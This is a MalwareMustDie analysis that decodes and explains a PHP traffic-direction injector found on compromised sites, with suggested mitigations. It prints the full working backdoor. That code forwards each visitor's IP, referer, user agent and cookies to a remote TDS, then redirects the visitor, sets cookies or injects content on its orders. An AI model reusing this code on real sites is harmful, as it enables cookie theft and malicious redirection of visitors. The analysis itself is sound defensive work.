  404. Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9I      ">KEY:     <input type=[...]
  405. a2V5                                   key
  406. Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlP      ">  Reserve: <input type[...]
  407. bGlu                                   lin
  408. Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9I      ">ID:      <input type=[...]
  409. aWQ=                                   id
  410. Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiI      ">  <input type="submit"[...]
  411. c2V0Y29uZmln                           setconfig
  412. a2V5                                   key
  413. a2V5                                   key
  414. Lw==                                   /
  415. U0NSSVBUX05BTUU=                       SCRIPT_NAME
  416. dXJs                                   url
  417. cHRkcw==                               ptds
  418. aXA=                                   ip
  419. cHRkc2lw                               ptdsip
  420. bGlu                                   lin
  421. cHRv                                   pto
  422. aWQ=                                   id
  423. cGVzZGlk                               pesdid
  424. a2V5                                   key
  425. cGtleQ==                               pkey
  426. dw==                                   w
  427. (empty string)                         (empty string)  -- implode() glue
  428. U2F2ZWQuCg==                           Saved.\n
  429. a2lsbA==                               kill
  430. a2V5                                   key
  431. a2V5                                   key
  432. Nzc3                                   777
  433. U0NSSVBUX0ZJTEVOQU1F                   SCRIPT_FILENAME
  434. U0NSSVBUX0ZJTEVOQU1F                   SCRIPT_FILENAME
  435. b2sK                                   ok\n
  436. Lw==                                   /
  437. dXJs                                   url
  438. aXA=                                   ip
  439. aXA=                                   ip
  440. aHR0cDovLw==                           http://
  441. SFRUUF9IT1NU                           HTTP_HOST
  442. U0NSSVBUX05BTUU=                       SCRIPT_NAME
  443. UkVNT1RFX0FERFI=                       REMOTE_ADDR
  444. bm8=                                   no
  445. SFRUUF9YX0ZPUldBUkRFRF9GT1I=           HTTP_X_FORWARDED_FOR
  446. eWVz                                   yes
  447. SFRUUF9VU0VSX0FHRU5U                   HTTP_USER_AGENT
  448. a2V5                                   key
  449. Jg==                                   &
  450. a2V5                                   key
  451. PQ==                                   =
  452. UVVFUllfU1RSSU5H                       QUERY_STRING
  453. R0VUIA==                               "GET " (trailing space)
  454. dXJs                                   url
  455. P2RvbT0=                               ?dom=
  456. JnJlZj0=                               &ref=
  457. JmlwPQ==                               &ip=
  458. JnByb3g9                               &prox=
  459. JmFnZW50PQ==                           &agent=
  460. JmNvb2tpZT0=                           &cookie=
  461. JmVzZGlkPQ==                           &esdid=
  462. aWQ=                                   id
  463. IEhUVFAvMS4wDQo=                       " HTTP/1.0\r\n"
  464. SG9zdDog                               Host:
  465. DQo=                                   \r\n  (CRLF, not null)
  466. Q29ubmVjdGlvbjogQ2xvc2UNCg0K           Connection: Close\r\n\r\n
  467. DQo=                                   \r\n  (CRLF, not null - the end-of-headers marker)
  468. ZG8=                                   do
  469. ZG8=                                   do
  470. IA==                                   (SPACE)
  471. bGlu                                   lin
  472. MjAw                                   200
  473. bGlu                                   lin
  474. Oi8v                                   ://
  475. aHR0cA==                               http
  476. SFRUUC8xLjEgMzAyIEZvdW5k               HTTP/1.1 302 Found
  477. TG9jYXRpb246IA==                       "Location: " (trailing space)
  478. Y29vaw==                               cook
  479. Jg==                                   &
  480. PQ==                                   =
  481. ZWNobw==                               echo                              
  482.  
  483. #========================
  484. # MANUAL SUBSTITUTION
  485. #========================
  486. // Now let's put those values one by one...
  487. // FYI: I did this manually in a text editor, with two windows open; it took me about 20 minutes.
  488.  
<?php

// Encrypted, serialized configuration (line 1 of the real file); rewritten in place by mode=setconfig below.
$cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';

error_reporting(0);     // hides every notice/warning, including the misused chmod() in the 'kill' mode
$key = 'kLQc8Y2g';      // cipher key, hard-coded: whoever has the file can decrypt its config
  495. function string_cpt($String, $Password)
  496.   {
  497.     $Salt   = 'RDrq';
  498.     $StrLen = strlen($String);
  499.     $Seq    = $Password;
  500.     $Gamma  = '';
  501.     while (strlen($Gamma) < $StrLen)
  502.       {
  503.         $Seq = pack('H*', sha1($Gamma . $Seq . $Salt));
  504.         $Gamma .= substr($Seq, 0, 8);
  505.       }
  506.     return $String ^ $Gamma;
  507.   }
  508.  
  509. $c    = unserialize(string_cpt(base64_decode($cfg), $key));
  510.  
  511. $mode = $_REQUEST['mode'];
  512. if ($mode == 'config' AND $c['key'] == $_REQUEST['key']) {
  513.     echo '<form name="form1" method="post" action=?mode=setconfig&key=' . $_REQUEST['key'] . '><pre>
  514. TDS:     <input type="text" name="ptds" value="' . $c['url'] . '">  TDS IP:  <input type="text" name="ptdsip" value="' . $c['ip'] . '">
  515. KEY:     <input type="text" name="pkey" value="' . $c['key'] . '">  Reserve: <input type="text" name="pto" value="' . $c['lin'] . '">
  516. ID:      <input type="text" name="pesdid" value="' . $c['id'] . '">  <input type="submit" name="Submit" value="ok"></pre>
  517. </form>';
  518.     die();
  519.   }
  520.  
  521. if ($mode == 'setconfig' AND $c['key'] == $_REQUEST['key']) {
  522.     $sn = explode('/', $_SERVER['SCRIPT_NAME']);
  523.     foreach ($sn as $snn) {
  524.         $scr = $snn;
  525.     }
  526.     $getlpa = file($scr);
  527.     $strng  = $getlpa[0];
  528.     $file   = file($scr);
  529.     for ($i = 0; $i < sizeof($file); $i++)
  530.         if ($i == 0) {
  531.             $c['url'] = $_POST['ptds'];
  532.             $c['ip'] = $_POST['ptdsip'];
  533.             $c['lin'] = $_POST['pto'];
  534.             $c['id'] = $_POST['pesdid'];
  535.             $c['key'] = $_POST['pkey'];
  536.             $cfg                = base64_encode(string_cpt(serialize($c), $key));
  537.             $file[$i]           = "<?\$cfg='$cfg'; ?>\n";
  538.         }
  539.     $fp = fopen($scr, 'w');
  540.     if (fputs($fp, implode('', $file)))
  541.         die('Saved.');
  542.     fclose($fp);
  543.   }
  544.  
  545. if ($mode == "killswitch" AND $c[key] == $_REQUEST[key])
  546.   {
  547.     chmod('777', $_SERVER['SCRIPT_FILENAME']);
  548.     if (unlink($_SERVER['SCRIPT_FILENAME']))
  549.         die('ok');
  550.   }
  551. $dom   = explode('/', $c['url']);
  552. $dom   = $dom[2];
  553. $dhost = $dom;
  554. if ($c['ip'])
  555.   {
  556.     $dom = $c['ip'];
  557.   }
  558. $fp = fsockopen($dom, 80, $errno, $errstr, 2);
  559. if (!$fp)
  560.   {
  561.     $res = 1;
  562.   }
  563. else
  564.   {
  565.     $t_dom  = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  566.     $t_ref  = urlencode($_SERVER['HTTP_REFERER']);
  567.     $t_ip   = urlencode($_SERVER['REMOTE_ADDR']);
  568.     $t_prox = 'no';
  569.     if ($_SERVER['HTTP_X_FORWARDED_FOR'])
  570.       {
  571.         $t_prox = 'yes';
  572.       }
  573.     $t_agent = urlencode($_SERVER['HTTP_USER_AGENT']);
  574.     foreach ($_COOKIE as $c['key'] => $val)
  575.       {
  576.         $t_cookie = $t_cookie . '&' . $c['key'] . = . $val;
  577.       }
  578.     $t_cookie = urlencode($t_cookie);
  579.     if (empty($t_cookie))
  580.       {
  581.         $t_cookie = urlencode($_SERVER['QUERY_STRING']);
  582.       }
  583.     $out = GET . $c['url'] . '?dom=' . $t_dom . '&ref=' . $t_ref . '&ip=' . $t_ip . '&prox=' . $t_prox . '&agent=' . $t_agent . '&cookie=' . $t_cookie . '&esdid=' . $c[id] .  'HTTP/1.0';
  584.     $out .= 'Host: ' . $dhost .``;
  585.     $out .= 'Connection: Close';
  586.     fwrite($fp, $out);
  587.     while (!feof($fp))
  588.       {
  589.         $str = fgets($fp, 128);
  590.         $ch .= $str;
  591.         if ($str == '' && empty($he))
  592.           {
  593.             $he = 'do';
  594.           }
  595.         if ($he == 'do')
  596.           {
  597.             $goto .= $str;
  598.           }
  599.       }
  600.     fclose($fp);
  601.   }
  602. $goto = substr($goto, 2);                 // drop the blank separator line the read loop above appended before the body
  603. $ch   = explode(' ', $ch);                // split the raw response on spaces so $ch[1] is the HTTP status code
  604. if ($res)                                 // $res is set in the branch above when the socket to the TDS could not be opened
  605.   {
  606.     $goto = $c['lin'];                    // fall back to the "Reserve" URL from the config
  607.   }
  608. if ($ch[1] == '200')
  609.   {
  610.   }
  611. else                                      // any non-200 answer from the TDS also falls back to the reserve URL
  612.   {
  613.     $goto = $c['lin'];
  614.   }
  615. $gotoe = explode('://', $goto);           // the scheme prefix selects the action: http -> 302, cook -> setcookie, echo -> raw output
  616. If ($gotoe[0] == 'http')
  617.   {
  618.     header('HTTP/1.1 302 Found');         // open redirect to whatever URL the TDS returned; 302 responses are a filtering/detection point
  619.     header('Location: '. $goto);
  620.   }
  621. $goto_body = substr($goto, 7);            // strip the 7-char "xxxx://" prefix to get the payload
  622. If ($gotoe[0] == 'cook')
  623.   {
  624.     $gotoee = explode('&', $goto_body);   // payload is "name=value&name=value..."
  625.     foreach ($gotoee as $setcook)
  626.       {
  627.         $set = explode('=', $setcook);
  628.         setcookie($set[0], $set[1]);      // cookie names/values come straight from the TDS response, no validation
  629.       }
  630.   }
  631. If ($gotoe[0] == 'echo')
  632.   {
  633.     echo $goto_body;                      // TDS-supplied body is written verbatim into the served page
  634.   }
  635. ?>
  636.  
  637. #===============================================================
  638. # PART TO PEEL & BREAK THE CODE INTO PIECES
  639. # AND UNDERSTAND THE PROCESS!!! < IMPORTANT!! SINCE YOU WILL SEE
  640. # SOME SUGGESTED WAYS/OPPORTUNITIES TO MITIGATE THIS THREAT!!
  641. #===============================================================
  642.  
  643. <?php
  644. #================================================
  645. #STEP 1 - WHAT'S $c? <-- the key of everything...
  646. #================================================
  647. // Run the code below to get $c
  648. // It needs a key and a salt.  <==== MITIGATE #1
  649. // The key is important:
  650. // $key = 'kLQc8Y2g';
  651. // The original string_cpt() function is the copy-paste code used by these stupid moronz,
  652. // it IS in the injection tool they have, so it won't change much!!  // <==== MITIGATE #2
  653.  
  654. $cfg = 'vyy/dDiqxusrXzq9oLBN53P34KOcvF9EhmMIFhDTywMBYLygupRNeIf94jSCpoYatJYSpCbvMdqX+AbQPm6ZlapFto/JcauCz3tbAVQ4593naQ334/ppISDYaelty5kx3Mtwnk8J6oEkRM+R7zHZK+NOEbgI/F6YD/J4dBlQg6wvHJN6Cf9RmnFR2gqibYC1FcSjywD0n/+jGcODSHJ6OE+OEfzgPK8ZVHQGALqeE00=';
  655.  
  656. // No no ! don't just base64-decode the above by itself, use the function below!
  657.  
  658. $key = 'kLQc8Y2g';
  659. function string_cpt($String, $Password)  // XOR-based symmetric en/decoder: the same call decodes $cfg and re-encodes the config
  660.   {
  661.     $Salt   = 'RDrq';                     // hard-coded salt; per the note above this code is reused as-is, so it is a candidate detection string
  662.     $StrLen = strlen($String);
  663.     $Seq    = $Password;                  // keystream state, seeded with the key
  664.     $Gamma  = '';                         // keystream, grown until it covers the whole input
  665.     while (strlen($Gamma) < $StrLen)
  666.       {
  667.         $Seq = pack('H*', sha1($Gamma . $Seq . $Salt));   // raw binary SHA-1 of (keystream so far . state . salt)
  668.         $Gamma .= substr($Seq, 0, 8);     // only the first 8 bytes of each digest extend the keystream
  669.       }
  670.     return $String ^ $Gamma;              // byte-wise XOR; PHP truncates to the shorter operand, so output length == strlen($String)
  671.   }
  672.  
  673. $c    = unserialize(string_cpt(base64_decode($cfg), $key));
  674.  
  675. // Add this code and run it...
  676.  
  677. //print "$cfg<br>";
  678. //print "$key<br>";
  679. print "$c";
  680.  
  681. // output:
  682.  
  683. Array  // <======= Hold this..substitute every $c in the above code to this string. :-)  (print on an array only shows the word "Array"; use print_r($c) to see the real keys url/ip/key/lin/id used below.)
  684.  
  685.  
  686. #================================
  687. #STEP 2 - REQUEST CONDITIONS
  688. #================================
  689.  
  690. // There are 3 ways to request:
  691. // "Config", "Setconfig" and "KillSwitch"
  692. //  Config = setting params, Setconfig = storing them into the file, Killswitch = self-destroy & run..
  693. // Codez:
  694. # if ($mode == 'config' AND Array['key'] == $_REQUEST['key'])
  695. # if ($mode == 'setconfig' AND Array['key'] == $_REQUEST['key']) {
  696. # if ($mode == "killswitch" AND Array[key] == $_REQUEST[key])  //<========== MITIGATE #3
  697.  
  698. #================================
  699. #STEP 3 - PEEL THE CODE
  700. #================================
  701.  
  702. # CONDITION: CONFIGURATION...
  703. # if ($mode == 'config' AND Array['key'] == $_REQUEST['key'])
  704.  
  705. //Noted↓
  706. $c = 'Array';
  707.  
  708. echo '<form name="form1" method="post" action=?mode=setconfig&key=' . $_REQUEST['key'] . '><pre>
  709. TDS:     <input type="text" name="ptds" value="' . Array['url'] . '">  TDS IP:  <input type="text" name="ptdsip" value="' . Array['ip'] . '">
  710. KEY:     <input type="text" name="pkey" value="' . Array['key'] . '">  Reserve: <input type="text" name="pto" value="' . Array['lin'] . '">
  711. ID:      <input type="text" name="pesdid" value="' . Array['id'] . '">  <input type="submit" name="Submit" value="ok"></pre>
  712. </form>';
  713.  
  714. // output is as per the image below:
  715. // And the bad actor uses this interface to configure the esd.php scam
  716.  
  717.         +-------------------+            +---------------+
  718.  TDS:   |                   |   TDSIP:   |               |
  719.         +-------------------+            +---------------+
  720.  KEY:   |                   |   RESERVE: |               |
  721.         +-------------------+            +---------------+
  722.  ID:    |                   |   +-----+
  723.         +-------------------+   | OK  |     // <========= MITIGATE #4, Block the form submit
  724.                                 +-----+                                if you don't need it..
  725.  
  726. // +------------------------------------------
  727. # NEXT CONDITION: SETTING A CONFIG...
  728. # if ($mode == 'setconfig' AND Array['key'] == $_REQUEST['key']) {
  729.  
  730. $sn = explode('/', $_SERVER['SCRIPT_NAME']);
  731. foreach ($sn as $snn) {
  732.         $scr = $snn;
  733.     }
  734.  
  735. // What are those?? Just print them out..
  736. // print "$sn<br>";print "$snn<br>"; print "$scr<br>";
  737. //Array
  738. //index.php    <========= MITIGATE #5
  739. //index.php   // This is the destination filename..
  740.  
  741. // Next...
  742. // Get the filename... some index.php or blah.php
  743.  
  744.     $getlpa = file($scr);
  745.     $strng  = $getlpa[0];
  746.     $file   = file($scr)
  747.  
  748. // Get the request condition for setconfig..
  749.  
  750.         if ($i == 0) {
  751.             Array['url'] = $_POST['ptds'];     // <==== MITIGATE #6
  752.             Array['ip'] = $_POST['ptdsip'];
  753.             Array['lin'] = $_POST['pto'];
  754.             Array['id'] = $_POST['pesdid'];
  755.             Array['key'] = $_POST['pkey'];
  756.  
  757. // execute the formulation for setconfig...
  758.  
  759.             $cfg                = base64_encode(string_cpt(serialize(Array), $key));
  760.             $file[$i]           = "<?\$cfg='$cfg'; ?>\n";
  761.  
  762. // so we know that $c represents an array of strings that holds the input...
  763. // and they save the config as a file locally here:
  764.  
  765.     $fp = fopen($scr, 'w');
  766.     if (fputs($fp, implode('', $file)))    <======= MITIGATE #7 PHP Setting..
  767.        die('Saved.');
  768.     fclose($fp);
  769.   }
  770.  
  771. //------------------------------------------
  772. # NEXT CONDITION: "THE REAL DEAL.."
  773. # if ($mode == "killswitch" AND $c[key] == $_REQUEST[key])
  774. # This killswitch mode is very important for executing the TDS, yet-
  775. # at the same time it can be used to neutralize the attack!!
  776.  
  777. // The deletion of the file is performed:
  778.  
  779.     chmod('777', $_SERVER['SCRIPT_FILENAME']);
  780.     if (unlink($_SERVER['SCRIPT_FILENAME']))
  781.  
  782. #================================
  783. # WEAPONIZED STARTS FROM HERE...
  784. #================================
  785.  
  786. // conditions checked for each incoming URL...
  787.  
  788. $dom   = explode('/', Array['url']);  
  789. $dom   = $dom[2];
  790. $dhost = $dom;
  791.  
  792. // Get the domains...
  793.  
  794. if ($c['ip'])
  795.   {
  796.     $dom = $c['ip'];
  797.   }
  798.  
  799. // $fp is the HTTP connection opened to the domain ($dom) on port 80...
  800.  
  801. $fp = fsockopen($dom, 80, $errno, $errstr, 2);   //  <========= MITIGATE #8 , #Blocking can be applied..
  802.  
  803. // Check if the connection can not be open...
  804.  
  805. if (!$fp)
  806.   {
  807.     $res = 1;
  808.  
  809. // If connected, grab the request, referer, remote IP & proxy info into:
  810.  
  811.     $t_dom  = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  812.     $t_ref  = urlencode($_SERVER['HTTP_REFERER']);
  813.     $t_ip   = urlencode($_SERVER['REMOTE_ADDR']);
  814.  
  815. // initializing the proxy flag to no...
  816.  
  817.     $t_prox = 'no';
  818.  
  819. // Except if the X-Forwarded-For header is present in the request...turn it to yes..
  820.  
  821.     if ($_SERVER['HTTP_X_FORWARDED_FOR'])            // <==== MITIGATE #9, avoid "Plain" X-FORWARDED_FOR
  822.       {
  823.         $t_prox = 'yes';
  824.       }
  825.  
  826. // Fall back to the query string if the cookie string is empty...     <====== MITIGATE 10 "Disable Cookie"
  827.  
  828.     $t_cookie = urlencode($t_cookie);
  829.     if (empty($t_cookie))
  830.       {
  831.         $t_cookie = urlencode($_SERVER['QUERY_STRING']);
  832.       }
  833.  
  834. // THIS PART IS PREPARATION FOR TDS/FORWARDING...
  835. // Assemble redirection forward URI via HTTP GET...
  836.  
  837.     $out = GET . $c['url'] . '?dom=' . $t_dom . '&ref=' . $t_ref . '&ip=' . $t_ip . '&prox=' . $t_prox . '&agent=' . $t_agent . '&cookie=' . $t_cookie . '&esdid=' . $c[id] .  'HTTP/1.0';
  838.     $out .= 'Host: ' . $dhost .``;
  839.     $out .= 'Connection: Close';
  840.  
  841. #================================
  842. # THE FORWARDING, THE "ACTION"...
  843. #================================
  844.  
  845. // Forwarding request! Open port and write the URI..
  846.     fwrite($fp, $out);             // <==== MITIGATE #10  Block fwrite usage if you don't need it..
  847.  
  848.  
  849. // Keep reading from the socket until EOF..
  850. // feeding the data into $ch (128 bytes per read)
  851. // and close it...
  852.  
  853.    while (!feof($fp))
  854.       {
  855.         $str = fgets($fp, 128);
  856.         $ch .= $str;
  857.         if ($str == '' && empty($he))
  858.           {
  859.             $he = 'do';
  860.           }
  861.         if ($he == 'do')
  862.           {
  863.             $goto .= $str;
  864.           }
  865.       }
  866.     fclose($fp)
  867.  
  868. // Strip the leading blank line; what is left in $goto is the TDS response body
  869.  
  870. $goto = substr($goto, 2);
  871. $ch   = explode(' ', $ch);
  872. if ($res)
  873.   {
  874.     $goto = $c['lin'];
  875.   }
  876.  
  877. //...if the response is 200 keep it, otherwise fall back to the reserve URL ($c['lin'])...
  878.  
  879. if ($ch[1] == '200')
  880.   {
  881.   }
  882. else
  883.   {
  884.     $goto = $c['lin'];
  885.   }
  886.  
  887. #====================================================
  888. # DIRECT FORWARD, 302 FORWARD, COOKIE FLAGGING
  889. #====================================================
  890.  
  891. // there you go...
  892. // The redirection...if you're good to go (condition:http)
  893.  
  894. $gotoe = explode('://', $goto);
  895.  
  896.  
  897. If ($gotoe[0] == 'http')
  898.   {
  899.     header('HTTP/1.1 302 Found');     <======== MITIGATE #11 // FILTER 302 (in your server HTACCESS)
  900.    header('Location: '. $goto);
  901.   }
  902.  
  903. // Cook the cookie :-)) (condition:cook)
  904.  
  905. $goto_body = substr($goto, 7);
  906. If ($gotoe[0] == 'cook')
  907.   {
  908.     $gotoee = explode('&', $goto_body);
  909.     foreach ($gotoee as $setcook)
  910.       {
  911.         $set = explode('=', $setcook);
  912.         setcookie($set[0], $set[1]); // <---Here's the #cookiebomb base flagging concept.
  913.       }
  914.   }
  915.  
  916. // If gotoe[0] is 'echo', the body is output as-is (condition:echo)
  917.  
  918. If ($gotoe[0] == 'echo')
  919.   {
  920.     echo $goto_body;
  921.   }
  922. ?>
  923.  
  924. ------------
  925. #MalwareMustDie
  926. #Decoded & Explained by @unixfreaxjp
  927. MalwareMustDie, NPO | http://malwaremustdie.org